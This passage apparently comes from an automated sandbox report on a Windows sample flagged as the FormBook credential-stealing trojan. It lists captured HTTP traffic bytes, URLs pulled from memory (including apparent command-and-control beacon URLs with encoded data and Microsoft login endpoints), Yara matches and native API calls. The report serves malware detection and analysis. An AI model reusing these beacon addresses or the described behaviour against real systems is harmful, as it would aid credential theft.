58 cf 9e 54 0d 08 45 ff 4f aa 16 a2 60 56 b4 b0 2a ee 34 f4 0e 7d 2c 98 44 1b c1 c6 55 d1 6b 15 9b 95 82 3b 2d 81 0f 1f c5 fb 5d 1e 6b 8c e1 a8 c7 a2 b6 0a 76 df 30 8b 1b 34 06 fb 82 95 43 53 d4 d1 c0 fa d2 47 1d 22 bb 12 46 76 46 44 f4 ec 79 ab 44 68 ce d9 15 b6 da 6e d9 35 a2 ad ca b1 38 b5 05 e9 b5 8b 2c 78 b9 2a 9a 18 dd b2 2c c5 30 43 1e 46 cc 25 b6 65 ef b8 b6 d2 74 0a 42 f9 86 7e ff 74 e0 f7 f9 6f fe 26 14 eb aa 1c 47 8d 53 e3 de 00 8b 7b 47 27 44 d8 c5 52 06 2a f9 9a fd 3b 63 f4 d4 b8 e3 41 bf 25 38 4b 7a f7 0a 3c a7 d0 f9 90 e3 2d be e5 ff 5b d0 43 7d ab e3 47 6b de cd 66 35 aa fd b4 4a c8 db ad c7 ce 2a 2e d1 a0 5f b2 be d1 11 c6 51 39 52 1b 2a 1a 23 78 07 7e 43 a4 f2 dd 92 35 5a 29 b0 63 bc 15 7e ab ed 92 2d 86 f9 cf 7a 2f 5c 5e 20 8c de 5a 4e 23 db b0 64 92 24 02 3f b6 28 1d 9c 11 fb 25 db 18 c8 d0 df 74 21 ea cd 9e 67 31 1f d6 93 3a bc 01 bd 6d 28 7e b2 58 dc 35 c3 aa 79 ae cd db d2 2c 4a 3f 04 25 ba 88 ec e5 57 63 d0 09 a5 06 4e 16 e3 77 62 9f 0f 20 df 5b 27 76 a3 e5 96 ec c5 e9 c2 8d c4 6d 10 a9 20 ef ca 59 c2 32 8d c6 a0 a3 46 1a b4 d1 3b 50 e7 59 cb 18 b1 3d ac 33 b0 89 13 4d 79 da c4 d4 87 90 a4 0b eb 68 1f 89 f5 40 94 23 0d 75 2b b6 b0 64 16 2d 4c eb 93 f2 84 d2 ed 58 40 a3 d5 83 c6 64 91 46 28 ec 8f 5b 3e e0 83 ce 87 14 72 a8 3f a0 9f b6 46 5b e0 b5 c1 69 ee 86 34 49 de 23 24 27 2f dc ee 28 d8 67 01 5f 2c 26 3e 52 eb 41 d6 f9 cb 63 e5 78 44 97 f8 9d 26 1c a4 fb 96 8e 39 3b 84 3f a6 e0 10 57 20 d1 8b 51 95 fb 13 23 76 b2 e1 42 8e f1 56 58 ed 3a 33 54 e5 bc 17 76 d2 52 18 c3 16 f3 d3 c0 40 84 dc de 05 f0 3c 80 01 19 8f a7 de 81 8f 5a 0a 33 81 69 b5 52 26 e7 06 36 79 70 42 0e f2 f4 5e b8 51 dd 10 45 ec 02 6f 21 04 92 2e 0b 7d e0 76 1c fe ae 2a 43 dc 1b 58 cf 9e a4 a7 22 d2 6e 99 07 b3 2a 86 70 68 00 62 c1 1a 0f 9b 55 d1 c4 e8 96 65 29 08 4a 88 04 46 a6 c3 d0 cf 25 b6 65 ef b8 24 15 88 a3 d2 99 8e 18 0e 65 6d 3a 68 30 90 32 64 14 e7 09 05 1f 53 a5 08 01 62 18 17 87 92 da 89 7a 1e 10 ed 5c 86 70 71 b7 3a 9b 9f 9c cd cf 0a 56 0e a8 aa b2 01 a1 e8 b5 aa 51 ed 53 a8 52 fa 8e 69 b5 2a d2 ad c5 58 d4 0a 6d 99 34 34 7a 55 64 24 45 3e ea 49 Data Ascii: R]o6}b}FIapdY6lQ =ymx9(im\Y[Ua,XTEO`V*4},DUk;-]k
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:08:52 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1226Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d ae 7f 05 ab 62 7d 18 46 cb 49 da 61 70 64 07 59 36 6c 03 f6 51 20 1b 8a 3d 05 14 79 6d b1 a1 78 39 92 8a ec 0e fd ef bb 94 28 c7 69 da 01 6d 05 03 96 ee e7 b9 e7 9c ea e9 0f 7f 5c fd f9 f7 ab 1f 59 13 5b b3 9e 55 e9 8f 19 61 b7 ab 02 2c ff eb ba 58 cf 9e 54 0d 08 45 ff 4f aa 16 a2 60 56 b4 b0 2a ee 34 f4 0e 7d 2c 98 44 1b c1 c6 55 d1 6b 15 9b 95 82 3b 2d 81 0f 1f c5 fb 5d 1e 6b 8c e1 a8 c7 a2 b6 0a 76 df 30 8b 1b 34 06 fb 82 95 43 53 d4 d1 c0 fa d2 47 1d 22 bb 12 46 76 46 44 f4 ec 79 ab 44 68 ce d9 15 b6 da 6e d9 35 a2 ad ca b1 38 b5 05 e9 b5 8b 2c 78 b9 2a 9a 18 dd b2 2c c5 30 43 1e 46 cc 25 b6 65 ef b8 b6 d2 74 0a 42 f9 86 7e ff 74 e0 f7 f9 6f fe 26 14 eb aa 1c 47 8d 53 e3 de 00 8b 7b 47 27 44 d8 c5 52 06 2a f9 9a fd 3b 63 f4 d4 b8 e3 41 bf 25 38 4b 7a f7 0a 3c a7 d0 f9 90 e3 2d be e5 ff 5b d0 43 7d ab e3 47 6b de cd 66 35 aa fd b4 4a c8 db ad c7 ce 2a 2e d1 a0 5f b2 be d1 11 c6 51 39 52 1b 2a 1a 23 78 07 7e 43 a4 f2 dd 92 35 5a 29 b0 63 bc 15 7e ab ed 92 2d 86 f9 cf 7a 2f 5c 5e 20 8c de 5a 4e 23 db b0 64 92 24 02 3f b6 28 1d 9c 11 fb 25 db 18 c8 d0 df 74 21 ea cd 9e 67 31 1f d6 93 3a bc 01 bd 6d 28 7e b2 58 dc 35 c3 aa 79 ae cd db d2 2c 4a 3f 04 25 ba 88 ec e5 57 63 d0 09 a5 06 4e 16 e3 77 62 9f 0f 20 df 5b 27 76 a3 e5 96 ec c5 e9 c2 8d c4 6d 10 a9 20 ef ca 59 c2 32 8d c6 a0 a3 46 1a b4 d1 3b 50 e7 59 cb 18 b1 3d ac 33 b0 89 13 4d 79 da c4 d4 87 90 a4 0b eb 68 1f 89 f5 40 94 23 0d 75 2b b6 b0 64 16 2d 4c eb 93 f2 84 d2 ed 58 40 a3 d5 83 c6 64 91 46 28 ec 8f 5b 3e e0 83 ce 87 14 72 a8 3f a0 9f b6 46 5b e0 b5 c1 69 ee 86 34 49 de 23 24 27 2f dc ee 28 d8 67 01 5f 2c 26 3e 52 eb 41 d6 f9 cb 63 e5 78 44 97 f8 9d 26 1c a4 fb 96 8e 39 3b 84 3f a6 e0 10 57 20 d1 8b 51 95 fb 13 23 76 b2 e1 42 8e f1 56 58 ed 3a 33 54 e5 bc 17 76 d2 52 18 c3 16 f3 d3 c0 40 84 dc de 05 f0 3c 80 01 19 8f a7 de 81 8f 5a 0a 33 81 69 b5 52 26 e7 06 36 79 70 42 0e f2 f4 5e b8 51 dd 10 45 ec 02 6f 21 04 92 2e 0b 7d e0 76 1c fe ae 2a 43 dc 1b 58 cf 9e a4 a7 22 d2 6e 99 07 b3 2a 86 70 68 00 62 c1 1a 0f 9b 55 d1 c4 e8 96 65 29 08 4a 88 04 46 a6 c3 d0 cf 25 b6 65 ef b8 24 15 88 a3 d2 99 8e 18 0e 65 6d 3a 68 30 90 32 64 14 e7 09 05 1f 53 a5 08 01 62 18 17 87 92 da 89 7a 1e 10 ed 5c 86 70 71 b7 3a 9b 9f 9c cd cf 0a 56 0e a8 aa b2 01 a1 e8 b5 aa 51 ed 53 a8 52 fa 8e 69 b5 2a d2 ad c5 58 d4 0a 6d 99 34 34 7a 55 64 24 45 3e ea 49 Data Ascii: R]o6}b}FIapdY6lQ =ymx9(im\Y[Ua,XTEO`V*4},DUk;-]k

Source: findstr.exe, 00000012.00000002.4531782947.0000000004248000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000034D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
Source: findstr.exe, 00000012.00000002.4531782947.0000000003BEC000.00000004.10000000.00040000.00000000.sdmp, findstr.exe, 00000012.00000002.4527435525.000000000301C000.00000004.00000020.00020000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000000.2549091116.0000000002E7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2801131487.000000003DD6C000.00000004.80000000.00040000.00000000.sdmp, 8SxJ9aYfJ1.exe, TwkYThKVQVaYn.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: findstr.exe, 00000012.00000002.4531782947.0000000003BEC000.00000004.10000000.00040000.00000000.sdmp, findstr.exe, 00000012.00000002.4527435525.000000000301C000.00000004.00000020.00020000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000000.2549091116.0000000002E7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2801131487.000000003DD6C000.00000004.80000000.00040000.00000000.sdmp, 8SxJ9aYfJ1.exe, TwkYThKVQVaYn.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: findstr.exe, 00000012.00000002.4531782947.0000000004248000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000034D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
Source: findstr.exe, 00000012.00000002.4531782947.0000000003F24000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000031B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2801131487.000000003E0A4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://miquwawa.com/tqql/?h20PB=Ilr0H&9Fjx=u0XZF227Y/r9f3hknYKw3A/OKyua8wzaE5MpTM9c21roNqnsj5Gisp9Vc
Source: findstr.exe, 00000012.00000002.4531782947.0000000003BEC000.00000004.10000000.00040000.00000000.sdmp, findstr.exe, 00000012.00000002.4527435525.000000000301C000.00000004.00000020.00020000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000000.2549091116.0000000002E7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2801131487.000000003DD6C000.00000004.80000000.00040000.00000000.sdmp, 8SxJ9aYfJ1.exe, TwkYThKVQVaYn.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: 8SxJ9aYfJ1.exe, 00000000.00000002.2120693064.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, TwkYThKVQVaYn.exe, 0000000B.00000002.2301461883.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 8SxJ9aYfJ1.exe, TwkYThKVQVaYn.exe.0.dr	String found in binary or memory: http://tempuri.org/dxsss.xsd
Source: sbJGUdSMCgtLQJ.exe, 00000017.00000002.4532261432.000000000526C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.artistcalculator.com
Source: sbJGUdSMCgtLQJ.exe, 00000017.00000002.4532261432.000000000526C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.artistcalculator.com/pf6m/
Source: findstr.exe, 00000012.00000002.4534379410.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: findstr.exe, 00000012.00000002.4531782947.000000000456C000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000037FC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.5.0/jquery.min.js
Source: findstr.exe, 00000012.00000002.4534379410.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: findstr.exe, 00000012.00000002.4531782947.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.000000000366A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
Source: findstr.exe, 00000012.00000002.4531782947.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.000000000366A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap-icons
Source: findstr.exe, 00000012.00000002.4531782947.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.000000000366A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css
Source: findstr.exe, 00000012.00000002.4534379410.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: findstr.exe, 00000012.00000002.4534379410.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: findstr.exe, 00000012.00000002.4531782947.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.000000000366A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://code.jquery.com/jquery-3.4.1.min.js
Source: findstr.exe, 00000012.00000002.4534198361.0000000006350000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4531782947.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000003CB2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: findstr.exe, 00000012.00000002.4534379410.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: findstr.exe, 00000012.00000002.4534379410.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: findstr.exe, 00000012.00000002.4534379410.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: findstr.exe, 00000012.00000002.4531782947.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.000000000366A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: findstr.exe, 00000012.00000002.4531782947.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.000000000366A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css2?family=Heebo:wght
Source: findstr.exe, 00000012.00000002.4531782947.000000000456C000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000037FC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: findstr.exe, 00000012.00000002.4531782947.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.000000000366A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com
Source: findstr.exe, 00000012.00000002.4534198361.0000000006350000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4531782947.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000003CB2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: findstr.exe, 00000012.00000002.4534198361.0000000006350000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4531782947.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000003CB2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: findstr.exe, 00000012.00000002.4534198361.0000000006350000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4531782947.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000003CB2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: findstr.exe, 00000012.00000002.4534198361.0000000006350000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4531782947.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000003CB2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?
Source: findstr.exe, 00000012.00000002.4531782947.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.000000000366A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://htmlcodex.com
Source: findstr.exe, 00000012.00000002.4531782947.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.000000000366A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://htmlcodex.com/credit-removal
Source: findstr.exe, 00000012.00000002.4534198361.0000000006350000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4531782947.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000003CB2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
Source: findstr.exe, 00000012.00000002.4534198361.0000000006350000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4531782947.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000003CB2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
Source: findstr.exe, 00000012.00000002.4528334347.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oau
Source: findstr.exe, 00000012.00000002.4528334347.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: findstr.exe, 00000012.00000002.4528334347.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: findstr.exe, 00000012.00000003.2669528287.0000000007D72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: findstr.exe, 00000012.00000002.4528334347.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: findstr.exe, 00000012.00000002.4528334347.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: findstr.exe, 00000012.00000002.4528334347.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033u
Source: findstr.exe, 00000012.00000002.4528334347.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: findstr.exe, 00000012.00000002.4528334347.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: findstr.exe, 00000012.00000002.4531782947.0000000004248000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000034D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lolipop.jp/
Source: findstr.exe, 00000012.00000002.4531782947.0000000004248000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000034D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
Source: findstr.exe, 00000012.00000002.4531782947.0000000004248000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000034D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://pepabo.com/
Source: findstr.exe, 00000012.00000002.4531782947.0000000004248000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000034D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.minne.com/files/banner/minne_600x500
Source: findstr.exe, 00000012.00000002.4531782947.0000000004248000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000034D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
Source: findstr.exe, 00000012.00000002.4534198361.0000000006350000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4531782947.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000003CB2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://track.uc.cn/collect
Source: findstr.exe, 00000012.00000002.4531782947.0000000003BEC000.00000004.10000000.00040000.00000000.sdmp, findstr.exe, 00000012.00000002.4527435525.000000000301C000.00000004.00000020.00020000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000000.2549091116.0000000002E7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2801131487.000000003DD6C000.00000004.80000000.00040000.00000000.sdmp, 8SxJ9aYfJ1.exe, TwkYThKVQVaYn.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: findstr.exe, 00000012.00000002.4534379410.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: findstr.exe, 00000012.00000002.4531782947.000000000456C000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000037FC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/api.js?hl=en
Source: findstr.exe, 00000012.00000002.4531782947.0000000004ED8000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000004168000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.michaelstutorgroup.com/7w90/?h20PB=Ilr0H&9Fjx=LhHpT0ljoQdAbtFlhTdeffbRPZ2ExzZlgOFaGkCDeg

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 10.2.8SxJ9aYfJ1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.8SxJ9aYfJ1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2392518879.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2641212802.0000000000EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4528036238.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4532261432.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4526845304.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4523991342.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4529774873.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2569786862.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4529392421.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2393885514.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.8SxJ9aYfJ1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 10.2.8SxJ9aYfJ1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2392518879.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000015.00000002.2641212802.0000000000EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.4528036238.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000017.00000002.4532261432.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.4526845304.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.4523991342.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.4529774873.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.2569786862.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.4529392421.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2393885514.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0042C013 NtClose,	10_2_0042C013
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672B60 NtClose,LdrInitializeThunk,	10_2_01672B60
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_01672DF0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_01672C70
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016735C0 NtCreateMutant,LdrInitializeThunk,	10_2_016735C0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01674340 NtSetContextThread,	10_2_01674340
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01674650 NtSuspendThread,	10_2_01674650
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672BE0 NtQueryValueKey,	10_2_01672BE0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672BF0 NtAllocateVirtualMemory,	10_2_01672BF0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672BA0 NtEnumerateValueKey,	10_2_01672BA0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672B80 NtQueryInformationFile,	10_2_01672B80
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672AF0 NtWriteFile,	10_2_01672AF0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672AD0 NtReadFile,	10_2_01672AD0
